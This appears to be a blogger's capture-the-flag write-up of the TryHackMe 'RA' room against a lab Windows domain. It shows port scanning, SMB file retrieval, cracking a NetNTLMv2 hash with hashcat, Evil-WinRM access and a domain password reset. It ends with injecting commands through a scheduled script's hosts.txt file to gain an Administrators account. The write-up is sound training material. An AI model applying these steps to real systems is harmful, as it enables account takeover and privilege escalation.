Try Hack Me Room — RA

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5222/tcp open xmpp-client
5269/tcp open xmpp-server
7070/tcp open realserver
7443/tcp open oracleas-https
7777/tcp open cbt
9090/tcp open zeus-admin
9091/tcp open xmltec-xmlmail

Nmap done: 1 IP address (1 host up) scanned in 6.16 seconds
DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
smb: \> ls
. D 0 Fri May 29 20:45:42 2020
.. D 0 Fri May 29 20:45:42 2020
Flag 1.txt A 45 Fri May 1 11:32:36 2020
spark_2_8_3.deb A 29526628 Fri May 29 20:45:01 2020
spark_2_8_3.dmg A 99555201 Sun May 3 07:06:58 2020
spark_2_8_3.exe A 78765568 Sun May 3 07:05:56 2020
spark_2_8_3.tar.gz A 123216290 Sun May 3 07:07:24 2020
15587583 blocks of size 4096. 10906613 blocks available
smb: \> get spark_2_8_3.deb
getting file \spark_2_8_3.deb of size 29526628 as spark_2_8_3.deb (2535.1 KiloBytes/sec) (average 2535.1 KiloBytes/sec)
smb: \>
┌─[arcy24@parrot]─[~/Documents/thm/RA]
└──╼ $hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 5 4500U with Radeon Graphics, 2891/2955 MB (1024 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 64 MBDictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
BUSE::WINDCORP:b12d08385cdce9f6:2180b9f978a1e4ce8db4c5ab79568bdc:01010000000000000ee6ae89a60cd70182a847a45f8e325b000000000200060053004d0042000100160053004d0042002d0054004f004f004c004b00490054000400120073006d0062002e006c006f00630061006c000300280073006500720076006500720032003000300033002e0073006d0062002e006c006f00630061006c000500120073006d0062002e006c006f00630061006c000800300030000000000000000100000000200000b08e13e054dadfdd6eba40596d673f2daae925f4e7d16362efadab115da1c1c80a00100000000000000000000000000000000000090000000000000000000000:xxxxxxSession..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: BUSE::WINDCORP:b12d08385cdce9f6:2180b9f978a1e4ce8db...000000
Time.Started.....: Fri Feb 26 15:44:00 2021 (7 secs)
Time.Estimated...: Fri Feb 26 15:44:07 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 488.2 kH/s (3.67ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2959360/14344385 (20.63%)
Rejected.........: 0/2959360 (0.00%)
Restore.Point....: 2957312/14344385 (20.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: v10014318 -> uyab_cakep
Started: Fri Feb 26 15:43:05 2021
Stopped: Fri Feb 26 15:44:08 2021
Groups for Buse
*Evil-WinRM* PS C:\scripts> get-ChildItem | get-aclDirectory: C:\scriptsPath             Owner                  Access
---- ----- ------
checkservers.ps1 BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow FullControl...
log.txt BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow FullControl...
*Evil-WinRM* PS C:\scripts>
# Read the File with the Hosts every cycle, this way to can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
$p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
Invoke-Expression $p
if($p)
{
# if the Host is available then just write it to the screen
write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White
[Array]$available += $_
}
else
*Evil-WinRM* PS C:\scripts> cd c:\Users\brittanycr
*Evil-WinRM* PS C:\Users\brittanycr> ls
Access to the path 'C:\Users\brittanycr' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\Users\brittanycr:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\brittanycr> more hosts.txt
Access is denied
At line:7 char:9
+ Get-Content $file | more.com
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
Cannot find path 'C:\Users\brittanycr\hosts.txt' because it does not exist.
At line:7 char:9
+ Get-Content $file | more.com
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\> net user brittanycr 123467890!@#$% /domain
The command completed successfully.
*Evil-WinRM* PS C:\>
*Evil-WinRM* PS C:\Users\buse\Documents> net group IT  brittanycr /add
net.exe : System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Access is denied.
host.txt file
smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.3 kb/s) (average 0.3 kb/s)
smb: \brittanycr\>
┌─[arcy24@parrot]─[~/Documents/thm/RA]
└──╼ $evil-winrm -i 10.10.79.150 -u Bugoks
Enter Password:
Evil-WinRM shell v2.3Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\Bugoks\Documents> net user Bugoks
User name Bugoks
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/28/2021 3:06:16 PM
Password expires 4/11/2021 3:06:16 PM
Password changeable 3/1/2021 3:06:16 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed AllLocal Group Memberships *Administrators
Global Group memberships *Domain Users

The command completed successfully.
  • Automated tools such as WinPeas or exploit suggester may not be enough to give you hints for priv exec.
  • Understanding powershell
  • AD Windows Accounts
  • net commands

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Arcy Caparros

Arcy Caparros

InfoSec, Dad, Jack of All Trades and Master of None